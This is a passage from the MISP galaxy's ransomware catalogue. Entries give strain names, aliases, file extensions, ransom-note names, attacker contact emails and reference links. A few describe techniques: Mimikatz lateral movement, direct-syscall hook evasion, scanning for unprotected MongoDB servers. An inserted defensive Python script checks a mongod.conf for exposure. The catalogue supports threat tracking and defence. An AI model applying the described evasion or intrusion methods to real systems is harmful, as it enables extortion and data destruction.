The tag is: misp-galaxy:ransomware="Pedcont"

Table 8475. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

http://id-ransomware.blogspot.com/2018/06/pedcont-ransomware.html

DiskDoctor

New Scarab Ransomware variant called DiskDoctor that appends the .DiskDoctor extension and drops a ransom note named HOW TO RECOVER ENCRYPTED FILES.TXT

The tag is: misp-galaxy:ransomware="DiskDoctor"

DiskDoctor is also known as:

  • Scarab-DiskDoctor

Table 8476. Table References

Links

https://id-ransomware.blogspot.com/2018/06/scarab-diskdoctor-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

RedEye

Jakub Kroustek discovered the RedEye Ransomware, which appends the .RedEye extension and wipes the contents of the files. RedEye can also rewrite the MBR with a screen that gives authors contact info and YouTube channel. Bart also wrote an article on this ransomware detailing how it works and what it does on a system. The ransomware author contacted BleepingComputer and told us that this ransomware was never intended for distribution and was created just for fun.

The tag is: misp-galaxy:ransomware="RedEye"

Table 8477. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

https://twitter.com/JakubKroustek/status/1004463935905509376

https://bartblaze.blogspot.com/2018/06/redeye-ransomware-theres-more-than.html

https://id-ransomware.blogspot.com/2018/06/redeye-ransomware.html

Aurora Ransomware

Typical ransom software, Aurora virus plays the role of blackmailing PC operators. It encrypts files and the encryption cipher it uses is pretty strong. After encryption, the virus attaches .aurora at the end of the file names, which makes it impossible to open the data. Thereafter, it dispatches the ransom note totaling 6 copies, without any change to the main objective, i.e., victims must write an electronic mail addressed to anonimus.mr@yahoo.com while staying connected until the criminals reply telling the ransom amount.

The tag is: misp-galaxy:ransomware="Aurora Ransomware"

Aurora Ransomware is also known as:

  • Zorro Ransomware

Table 8478. Table References

Links

https://www.spamfighter.com/News-21588-Aurora-Ransomware-Circulating-the-Cyber-Space.htm

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

https://twitter.com/demonslay335/status/1004435398687379456

https://www.bleepingcomputer.com/news/security/aurora-zorro-ransomware-actively-being-distributed/

https://id-ransomware.blogspot.com/2018/05/aurora-ransomware.html

PGPSnippet Ransomware

The tag is: misp-galaxy:ransomware="PGPSnippet Ransomware"

Table 8479. Table References

Links

https://twitter.com/demonslay335/status/1005138187621191681

Donut

S!Ri found a new ransomware called Donut that appends the .donut extension and uses the email donutmmm@tutanota.com.

The tag is: misp-galaxy:ransomware="Donut"

Table 8481. Table References

Links

https://twitter.com/siri_urz/status/1005438610806583296

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-15th-2018-dbger-scarab-and-more/

http://id-ransomware.blogspot.com/2018/06/donut-ransomware.html

Paradise Ransomware

MalwareHunterTeam discovered a new Paradise Ransomware variant that uses the extension _V.0.0.0.1{paradise@all-ransomware.info}.prt and drops a ransom note named PARADISE_README_paradise@all-ransomware.info.txt.

The tag is: misp-galaxy:ransomware="Paradise Ransomware"

Table 8483. Table References

Links

https://twitter.com/malwrhunterteam/status/1005420103415017472

https://twitter.com/malwrhunterteam/status/993499349199056897

http://id-ransomware.blogspot.com/2017/09/paradise-ransomware.html

B2DR Ransomware

Uses the .reycarnasi1983@protonmail.com.gw3w extension and a ransom note named ScrewYou.txt

The tag is: misp-galaxy:ransomware="B2DR Ransomware"

Table 8484. Table References

Links

https://twitter.com/demonslay335/status/1006220895302705154

https://id-ransomware.blogspot.com/2018/03/b2dr-ransomware.html

YYTO Ransomware

Uses the extension .codyprince92@mail.com.ovgm and drops a ransom note named Readme.txt

The tag is: misp-galaxy:ransomware="YYTO Ransomware"

Table 8485. Table References

Links

https://twitter.com/demonslay335/status/1006237353474756610

http://id-ransomware.blogspot.com/2017/05/yyto-ransomware.html

Unnamed ramsomware 2

The tag is: misp-galaxy:ransomware="Unnamed ramsomware 2"

Table 8486. Table References

Links

https://twitter.com/demonslay335/status/1007334654918250496

DirCrypt

The tag is: misp-galaxy:ransomware="DirCrypt"

DirCrypt has relationships with:

  • similar: misp-galaxy:malpedia="DirCrypt" with estimative-language:likelihood-probability="likely"

Table 8488. Table References

Links

https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/

DBGer Ransomware

The authors of the Satan ransomware have rebranded their "product" and they now go by the name of DBGer ransomware, according to security researcher MalwareHunter, who spotted this new version earlier today. The change was not only in name but also in the ransomware’s modus operandi. According to the researcher, whose discovery was later confirmed by an Intezer code similarity analysis, the new (Satan) DBGer ransomware now also incorporates Mimikatz, an open-source password-dumping utility. The purpose of DBGer incorporating Mimikatz is for lateral movement inside compromised networks. This fits a recently observed trend in Satan’s modus operandi.

The tag is: misp-galaxy:ransomware="DBGer Ransomware"

Table 8489. Table References

Links

https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/

http://id-ransomware.blogspot.com/2018/06/dbger-ransomware.html

RASTAKHIZ

Hidden Tear variant discovered in October 2016. After activation, provides victims with an unlimited amount of time to gather the requested ransom money and pay it. Related unlock keys and the response were sent to and from a Gmail address.

The tag is: misp-galaxy:ransomware="RASTAKHIZ"

Table 8490. Table References

Links

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

https://id-ransomware.blogspot.com/2017/11/rastakhiz-ransomware.html

TYRANT

DUMB variant discovered on November 16, 2017. Disguised itself as a popular virtual private network (VPN) in Iran known as Psiphon and infected Iranian users. Included Farsi-language ransom note, decryptable in the same way as previous DUMB-based variants. Message requested only US$15 for unlock key. Advertised two local and Iran-based payment processors: exchange.ir and webmoney.ir. Shared unique and specialized indicators with RASTAKHIZ; iDefense threat intelligence analysts believe this similarity confirms that the same actor was behind the repurposing of both types of ransomware.

The tag is: misp-galaxy:ransomware="TYRANT"

TYRANT is also known as:

  • Crypto Tyrant

Table 8491. Table References

Links

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

http://id-ransomware.blogspot.com/2017/10/tyrant-ransomware.html

WannaSmile

zCrypt variant discovered on November 17, 2017, one day after the discovery of TYRANT. Used Farsi-language ransom note asking for a staggering 20 Bitcoin ransom payment. Also advertised local Iran-based payment processors and exchanges (www.exchangeing[.]ir, www.payment24[.]ir, www.farhadexchange.net, and www.digiarz.com) through which Bitcoins could be acquired.

The tag is: misp-galaxy:ransomware="WannaSmile"

Table 8492. Table References

Links

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

https://id-ransomware.blogspot.com/2017/11/wannasmile-ransomware.html

Unnamed Android Ransomware

Uses APK Editor Pro. Picks and activates DEX>Smali from APK Editor. Utilizes LockService application and edits the “const-string v4, value” to a desired unlock key. Changes contact information within the ransom note. Once the victim has downloaded the malicious app, the only way to recover its content is to pay the ransom and receive the unlock key.

The tag is: misp-galaxy:ransomware="Unnamed Android Ransomware"

Table 8493. Table References

Links

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

KEYPASS

A new distribution campaign is underway for a STOP Ransomware variant called KeyPass, based on the number of victims that have been seen. Unfortunately, how the ransomware is being distributed is unknown at this time.

The tag is: misp-galaxy:ransomware="KEYPASS"

KEYPASS is also known as:

  • KeyPass

Table 8494. Table References

Links

https://www.bleepingcomputer.com/news/security/new-keypass-ransomware-campaign-underway/

https://www.kaspersky.com/blog/keypass-ransomware/23447/

STOP Ransomware

Emmanuel_ADC-Soft found a new STOP Ransomware variant that appends the .INFOWAIT extension and drops a ransom note named !readme.txt.

The tag is: misp-galaxy:ransomware="STOP Ransomware"

Table 8495. Table References

Links

https://twitter.com/Emm_ADC_Soft/status/1064459080016760833

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/

https://twitter.com/MarceloRivero/status/1065694365056679936

http://id-ransomware.blogspot.com/2017/12/stop-ransomware.html

Barack Obama’s Everlasting Blue Blackmail Virus Ransomware

A new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a "tip" to decrypt the files.

The tag is: misp-galaxy:ransomware="Barack Obama’s Everlasting Blue Blackmail Virus Ransomware"

Barack Obama’s Everlasting Blue Blackmail Virus Ransomware is also known as:

  • Barack Obama’s Blackmail Virus Ransomware

Table 8496. Table References

Links

https://twitter.com/malwrhunterteam/status/1032242391665790981

https://www.bleepingcomputer.com/news/security/barack-obamas-blackmail-virus-ransomware-only-encrypts-exe-files/

https://id-ransomware.blogspot.com/2018/08/barack-obamas-ransomware.html

CryptoNar

When the CryptoNar, or Crypto Nar, Ransomware encrypts a victim’s files it will perform the encryption differently depending on the type of file being encrypted. If the targeted file has a .txt or .md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file’s name. All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extension appended to the file’s name.

The tag is: misp-galaxy:ransomware="CryptoNar"

CryptoNar has relationships with:

  • similar: misp-galaxy:ransomware="CryptoJoker" with estimative-language:likelihood-probability="likely"

Table 8497. Table References

Links

https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/

https://twitter.com/malwrhunterteam/status/1034492151541977088

https://id-ransomware.blogspot.com/2018/08/cryptonar-ransomware.html

CreamPie Ransomware

Jakub Kroustek found what appears to be an in-dev version of the CreamPie Ransomware. It does not currently display a ransom note, but does encrypt files and appends the .[backdata@cock.li].CreamPie extension to them.

The tag is: misp-galaxy:ransomware="CreamPie Ransomware"

Table 8498. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

https://twitter.com/JakubKroustek/status/1033656080839139333

https://id-ransomware.blogspot.com/2018/08/creampie-ransomware.html

Jeff the Ransomware

Looks to be in-development as it does not encrypt.

The tag is: misp-galaxy:ransomware="Jeff the Ransomware"

Table 8499. Table References

Links

https://twitter.com/leotpsc/status/1033625496003731458

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

Cassetto Ransomware

Michael Gillespie saw an encrypted file uploaded to ID Ransomware that appends the .cassetto extension and drops a ransom note named IMPORTANT ABOUT DECRYPT.txt.

The tag is: misp-galaxy:ransomware="Cassetto Ransomware"

Table 8500. Table References

Links

https://twitter.com/demonslay335/status/1034213399922524160

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

https://id-ransomware.blogspot.com/2018/08/cassetto-ransomware.html

Acroware Cryptolocker Ransomware

Leo discovered a screenlocker that calls itself Acroware Cryptolocker Ransomware. It does not encrypt.

The tag is: misp-galaxy:ransomware="Acroware Cryptolocker Ransomware"

Acroware Cryptolocker Ransomware is also known as:

  • Acroware Screenlocker

Table 8501. Table References

Links

https://twitter.com/leotpsc/status/1034346447112679430

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

Termite Ransomware

Ben Hunter discovered a new ransomware called Termite Ransomware. When encrypting a computer it will append the .aaaaaa extension to encrypted files.

The tag is: misp-galaxy:ransomware="Termite Ransomware"

Table 8502. Table References

Links

https://twitter.com/B_H101/status/1034379267956715520

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

PICO Ransomware

S!Ri found a new Thanatos Ransomware variant called PICO Ransomware. This ransomware will append the .PICO extension to encrypted files and drop a ransom note named README.txt.

The tag is: misp-galaxy:ransomware="PICO Ransomware"

PICO Ransomware is also known as:

  • Pico Ransomware

Table 8503. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

https://twitter.com/siri_urz/status/1035138577934557184

Sigma Ransomware

Today one of our volunteers, Aura, told me about a new malspam campaign pretending to be from Craigslist that is under way and distributing the Sigma Ransomware. These spam emails contain password protected Word or RTF documents that download the Sigma Ransomware executable from a remote site and install it on a recipient’s computer.

The tag is: misp-galaxy:ransomware="Sigma Ransomware"

Table 8504. Table References

Links

https://www.bleepingcomputer.com/news/security/sigma-ransomware-being-distributed-using-fake-craigslist-malspam/

Crypt0saur

The tag is: misp-galaxy:ransomware="Crypt0saur"

Mongo Lock

An attack called Mongo Lock is targeting remotely accessible and unprotected MongoDB databases, wiping them, and then demanding a ransom in order to get the contents back. While this new campaign is using a name to identify itself, these types of attacks are not new and MongoDB databases have been targeted for a while now. These hijacks work by attackers scanning the Internet or using services such as Shodan.io to search for unprotected MongoDB servers. Once connected, the attackers may export the databases, delete them, and then create a ransom note explaining how to get the databases back.

The tag is: misp-galaxy:ransomware="Mongo Lock"

Table 8505. Table References

Links

https://www.bleepingcomputer.com/news/security/mongo-lock-attack-ransoming-deleted-mongodb-databases/
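The exposure Mongo Lock depends on is a mongod that is reachable from the Internet and accepts unauthenticated clients. The following is an added example (not code from the MISP galaxy or from the referenced BleepingComputer article) that audits a mongod.conf for exactly those two settings, showing the weak configuration beside the corrected one. The sample configurations are constructed; the option names net.bindIp, net.bindIpAll and security.authorization are real mongod.conf keys, but the parser handles only the two-level section/key layout mongod.conf uses, not general YAML, and the assumption that an unset bindIp means all interfaces only holds for MongoDB releases before 3.6.

```python
"""Audit a mongod.conf for the exposure a Mongo Lock-style attack relies on.

Added example, not code from the MISP galaxy or the referenced article. The
two configurations below are constructed. Option names are real mongod.conf
keys; the parser covers only the section/key layout mongod.conf uses.
"""

# Constructed: listens on every interface, no authentication required.
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0      # reachable from anywhere the host is routable
security:
  authorization: disabled
"""

# Constructed: the corrected configuration.
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1,10.0.5.12   # loopback plus one internal address
security:
  authorization: enabled
"""

# bindIp values that mean "every interface".
ALL_INTERFACES = {"0.0.0.0", "::", "*"}


def parse_conf(text):
    """Parse the 'section:' / '  key: value' subset of YAML used by mongod.conf.

    Returns {section: {key: value}}. Comments and blank lines are dropped.
    This is not a general YAML parser and does not handle deeper nesting.
    """
    conf = {}
    section = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        if not line.startswith(" "):
            section = line.strip().rstrip(":")
            conf.setdefault(section, {})
        elif section is not None and ":" in line:
            key, value = line.strip().split(":", 1)
            conf[section][key.strip()] = value.strip()
    return conf


def audit(text):
    """Return a list of findings; an empty list means neither exposure is present."""
    conf = parse_conf(text)
    net = conf.get("net", {})
    security = conf.get("security", {})
    findings = []

    bind = net.get("bindIp")
    if net.get("bindIpAll", "false").lower() == "true":
        findings.append("net.bindIpAll is true: mongod listens on all interfaces")
    elif bind is None:
        # Assumption: releases before 3.6 bound to all interfaces by default.
        findings.append("net.bindIp not set: all interfaces on MongoDB < 3.6")
    else:
        exposed = sorted({a.strip() for a in bind.split(",")} & ALL_INTERFACES)
        if exposed:
            findings.append(f"net.bindIp {exposed} listens on all interfaces")

    # MongoDB runs without access control unless authorization is enabled.
    if security.get("authorization", "disabled").lower() != "enabled":
        findings.append(
            "security.authorization is not 'enabled': any client that can "
            "connect may dump and drop every database"
        )
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf) or ["no findings"])
```

Both findings together are the Mongo Lock precondition; fixing only one of them still leaves either an open listener or an unauthenticated one, so the audit reports each independently.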

Kraken Cryptor Ransomware

The Kraken Cryptor Ransomware is a newer ransomware that was released in August 2018. A new version, called Kraken Cryptor 1.5, was recently released that is masquerading as the legitimate SuperAntiSpyware anti-malware program in order to trick users into installing it.

The tag is: misp-galaxy:ransomware="Kraken Cryptor Ransomware"

Table 8506. Table References

Links

https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-now-installing-the-kraken-cryptor-ransomware/

https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/

https://twitter.com/MarceloRivero/status/1059575186117328898

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/

SAVEfiles

The tag is: misp-galaxy:ransomware="SAVEfiles"

Table 8507. Table References

Links

https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-pushing-the-savefiles-ransomware/

File-Locker

The File-Locker Ransomware is a Hidden Tear variant that targets victims in Korea. When victims are infected it leaves a ransom note requesting 50,000 Won, or approximately 50 USD, to get the files back. This ransomware uses AES encryption with a static password of "dnwls07193147", so it is easily decryptable.

The tag is: misp-galaxy:ransomware="File-Locker"

Table 8508. Table References

Links

https://www.bleepingcomputer.com/news/security/file-locker-ransomware-targets-korean-victims-and-asks-for-50k-won/

CommonRansom

A new ransomware called CommonRansom was discovered that has a very bizarre request. In order to decrypt a computer after a payment is made, they require the victim to open up Remote Desktop Services on the affected computer and send them admin credentials in order to decrypt the victim’s files.

The tag is: misp-galaxy:ransomware="CommonRansom"

Table 8509. Table References

Links

https://www.bleepingcomputer.com/news/security/commonransom-ransomware-demands-rdp-access-to-decrypt-files/

God Crypt Joke Ransomware

MalwareHunterTeam found a new ransomware called God Crypt that does not appear to decrypt and appears to be a joke ransomware. It has an unlock code of 29b579fb811f05c3c334a2bd2646a27a.

The tag is: misp-galaxy:ransomware="God Crypt Joke Ransomware"

God Crypt Joke Ransomware is also known as:

  • Godsomware v1.0

  • Ransomware God Crypt

Table 8510. Table References

Links

https://twitter.com/malwrhunterteam/status/1048616343975682048

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

DecryptFox Ransomware

Michael Gillespie found a new ransomware uploaded to ID Ransomware that appends the .encr extension and drops a ransom note named readmy.txt.

The tag is: misp-galaxy:ransomware="DecryptFox Ransomware"

Table 8511. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://twitter.com/demonslay335/status/1049325784979132417

garrantydecrypt

Michael Gillespie found a new ransomware that appends the .garrantydecrypt extension and drops a ransom note named RECOVERY_FILES.txt.

The tag is: misp-galaxy:ransomware="garrantydecrypt"

Table 8512. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://www.bleepingcomputer.com/news/security/ransomware-pretends-to-be-proton-security-team-securing-data-from-hackers/

MVP Ransomware

Siri discovered a new ransomware that is appending the .mvp extension to encrypted files.

The tag is: misp-galaxy:ransomware="MVP Ransomware"

Table 8513. Table References

Links

https://twitter.com/siri_urz/status/1039077365039673344

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

StorageCrypter

Michael Gillespie noticed numerous submissions to ID Ransomware from South Korea for the StorageCrypter ransomware. This version is using a new ransom note named read_me_for_recover_your_files.txt.

The tag is: misp-galaxy:ransomware="StorageCrypter"

StorageCrypter is also known as:

  • SambaCry

Table 8514. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

Rektware

GrujaRS discovered a new ransomware called Rektware that appends the .CQScSFy extension.

The tag is: misp-galaxy:ransomware="Rektware"

Table 8515. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

https://twitter.com/GrujaRS/status/1040677247735279616

M@r1a ransomware

The tag is: misp-galaxy:ransomware="M@r1a ransomware"

M@r1a ransomware is also known as:

  • M@r1a

  • BlackHeart

Table 8516. Table References

Links

https://twitter.com/malwrhunterteam/status/1058775145005887489

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/

"prepending (enc) ransomware" (Not an official name)

The tag is: misp-galaxy:ransomware=""prepending (enc) ransomware" (Not an official name)"

"prepending (enc) ransomware" (Not an official name) is also known as:

  • Aperfectday2018

Table 8517. Table References

Links

https://twitter.com/demonslay335/status/1059470985055875074

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/

PyCL Ransomware

The tag is: misp-galaxy:ransomware="PyCL Ransomware"

PyCL Ransomware is also known as:

  • Dxh26wam

Table 8518. Table References

Links

https://twitter.com/demonslay335/status/1060921043957755904

Vapor Ransomware

MalwareHunterTeam discovered the Vapor Ransomware, which appends the .Vapor extension to encrypted files and deletes files if the ransom is not paid in time.

The tag is: misp-galaxy:ransomware="Vapor Ransomware"

Table 8519. Table References

Links

https://twitter.com/malwrhunterteam/status/1063769884608348160

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/

EnyBenyHorsuke Ransomware

GrujaRS discovered a new ransomware called EnyBenyHorsuke Ransomware that appends the .Horsuke extension to encrypted files.

The tag is: misp-galaxy:ransomware="EnyBenyHorsuke Ransomware"

Table 8520. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/

https://twitter.com/GrujaRS/status/1063930127610986496

EnyBeny Nuclear Ransomware

GrujaRS discovered a new in-development ransomware called EnyBeny Nuclear Ransomware that was meant to append the extension .PERSONAL_ID:.Nuclear to encrypted files, but failed to do so due to a bug.

The tag is: misp-galaxy:ransomware="EnyBeny Nuclear Ransomware"

Table 8522. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-30th-2018-indictments-sanctions-and-more/

https://twitter.com/GrujaRS/status/1066799421080461312

https://www.youtube.com/watch?v=_aaFon7FVbc

Lucky Ransomware

Michael Gillespie discovered a new ransomware that renames encrypted files to "[original].[random].lucky" and drops a ransom note named How_To_Decrypt_My_File.txt.

The tag is: misp-galaxy:ransomware="Lucky Ransomware"

Table 8523. Table References

Links

https://twitter.com/demonslay335/status/1067109661076262913

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-30th-2018-indictments-sanctions-and-more/

WeChat Ransom

Over 100,000 computers in China were infected in just a few days with poorly written ransomware that encrypts local files and steals credentials for multiple Chinese online services. The crooks show a screen titled UNNAMED1989 and demand a ransom of 110 yuan ($16) from the victim in exchange for decrypting the files, payable via Tencent's WeChat payment service by scanning a QR code.

The tag is: misp-galaxy:ransomware="WeChat Ransom"

WeChat Ransom is also known as:

  • UNNAMED1989

Table 8524. Table References

Links

https://www.bleepingcomputer.com/news/security/ransomware-infects-100k-pcs-in-china-demands-wechat-payment/

https://www.bleepingcomputer.com/news/security/chinese-police-arrest-dev-behind-unnamed1989-wechat-ransomware/

Dablio Ransomware

The tag is: misp-galaxy:ransomware="Dablio Ransomware"

Dablio Ransomware has relationships with:

  • similar: misp-galaxy:ransomware="HolyCrypt" with estimative-language:likelihood-probability="likely"

Table 8526. Table References

Links

https://twitter.com/struppigel/status/1069905624954269696

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-7th-2018-wechat-ransomware-scammers-and-more/

Gerber Ransomware 3.0

The tag is: misp-galaxy:ransomware="Gerber Ransomware 3.0"

EQ Ransomware

GrujaRS discovered the EQ Ransomware that drops a ransom note named README_BACK_FILES.htm and uses .f**k (censored) as its extension for encrypted files. May be GlobeImposter.

The tag is: misp-galaxy:ransomware="EQ Ransomware"

Table 8530. Table References

Links

https://twitter.com/GrujaRS/status/1071349228172124160

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-14th-2018-slow-week/

https://www.youtube.com/watch?v=uHYY6XZZEw4

Mercury Ransomware

Appends the ".Mercury" extension and drops a note named "!!!READ_IT!!!.txt" containing four different 64-character hex strings as IDs, three of which contain dashes. A possible file marker is present and is identical across different victims' files.

The tag is: misp-galaxy:ransomware="Mercury Ransomware"

Table 8531. Table References

Links

https://twitter.com/demonslay335/status/1072164314608480257

Forma Ransomware

The tag is: misp-galaxy:ransomware="Forma Ransomware"

Forma Ransomware is also known as:

  • FORMA

Table 8532. Table References

Links

https://twitter.com/GrujaRS/status/1072468548977680385

Djvu

The tag is: misp-galaxy:ransomware="Djvu"

Table 8533. Table References

Links

https://twitter.com/demonslay335/status/1072907748155842565

Ryuk ransomware

Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD.

The tag is: misp-galaxy:ransomware="Ryuk ransomware"

Table 8534. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf

BitPaymer

In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.

The tag is: misp-galaxy:ransomware="BitPaymer"

BitPaymer is also known as:

  • FriedEx

  • IEncrypt

Table 8535. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

LockerGoga

The tag is: misp-galaxy:ransomware="LockerGoga"

LockerGoga has relationships with:

  • similar: misp-galaxy:ransomware="Nodera Ransomware" with estimative-language:likelihood-probability="roughly-even-chance"

Table 8536. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf

Princess Evolution

We have been observing a malvertising campaign via Rig exploit kit delivering a cryptocurrency-mining malware and the GandCrab ransomware since July 25. On August 1, we found Rig’s traffic stream dropping a then-unknown ransomware. Delving into this seemingly new ransomware, we checked its ransom payment page in the Tor network and saw it was called Princess Evolution (detected by Trend Micro as RANSOM_PRINCESSLOCKER.B), and was actually a new version of the Princess Locker ransomware that emerged in 2016. Based on its recent advertisement in underground forums, it appears that its operators are peddling Princess Evolution as a ransomware as a service (RaaS) and are looking for affiliates. The new malvertising campaign we observed since July 25 is notable in that the malvertisements included Coinhive (COINMINER_MALXMR.TIDBF). Even if users aren’t diverted to the exploit kit and infected with the ransomware, the cybercriminals can still earn illicit profit through cryptocurrency mining. Another characteristic of this new campaign is that they hosted their malvertisement page on a free web hosting service and used domain name system canonical name (DNS CNAME) to map their advertisement domain on a malicious webpage on the service.

The tag is: misp-galaxy:ransomware="Princess Evolution"

Princess Evolution is also known as:

  • PrincessLocker Evolution

Table 8537. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-as-a-service-princess-evolution-looking-for-affiliates/

Jokeroo

A new Ransomware-as-a-Service called Jokeroo is being promoted on underground hacking sites and via Twitter that allows affiliates to allegedly gain access to a fully functional ransomware and payment server. According to a malware researcher named Damian, the Jokeroo RaaS first started promoting itself as a GandCrab Ransomware RaaS on the underground hacking forum Exploit.in.

The tag is: misp-galaxy:ransomware="Jokeroo"

Jokeroo is also known as:

  • Fake GandCrab

Table 8538. Table References

Links

https://www.bleepingcomputer.com/news/security/jokeroo-ransomware-as-a-service-offers-multiple-membership-packages/

GlobeImposter

During December 2017, a new variant of the GlobeImposter Ransomware was detected for the first time and reported on malware-traffic-analysis. At first sight this ransomware looks very similar to other ransomware samples and uses common techniques such as process hollowing. However, deeper inspection showed that, like LockPoS, which was analyzed by CyberBit, GlobeImposter too bypasses user-mode hooks by directly invoking system calls. That this evasion technique is being leveraged by new malware samples may indicate the beginning of a trend aimed at bypassing user-mode security products.

The tag is: misp-galaxy:ransomware="GlobeImposter"

Table 8539. Table References

Links

https://www.fortinet.com/blog/threat-research/analysis-of-new-globeimposter-ransomware-variant.html

BlackWorm

BlackWorm Ransomware is a malicious computer infection that encrypts your files, and then does everything it can to prevent you from restoring them. It needs you to pay $200 for the decryption key, but there is no guarantee that the people behind this infection would really issue the decryption tool for you.

The tag is: misp-galaxy:ransomware="BlackWorm"

Table 8540. Table References

Links

https://spyware-techie.com/blackworm-ransomware-removal-guide

Tellyouthepass

Tellyouthepass is a ransomware that alters system files and registry entries and encrypts personal photos, documents, archives and data on servers. Strong encryption algorithms are used to change the original content of each file and make the data useless.

The tag is: misp-galaxy:ransomware="Tellyouthepass"

Table 8541. Table References

Links

https://malware.wikia.org/wiki/Tellyouthepass

BigBobRoss

BigBobRoss ransomware is a crypto-ransomware that demands a ransom in Bitcoin to return encrypted files, which are marked with the .obfuscated extension.

The tag is: misp-galaxy:ransomware="BigBobRoss"

Table 8542. Table References

Links

https://www.2-spyware.com/remove-bigbobross-ransomware.html

Planetary

First discovered by malware security analyst Lawrence Abrams, Planetary is an updated variant of another high-risk ransomware called HC7.

The tag is: misp-galaxy:ransomware="Planetary"

Table 8543. Table References

Links

https://www.pcrisk.com/removal-guides/12121-planetary-ransomware

Cr1ptT0r

Cr1ptT0r Ransomware Targets NAS Devices with Old Firmware.

The tag is: misp-galaxy:ransomware="Cr1ptT0r"

Cr1ptT0r is also known as:

  • Criptt0r

  • Cr1pt0r

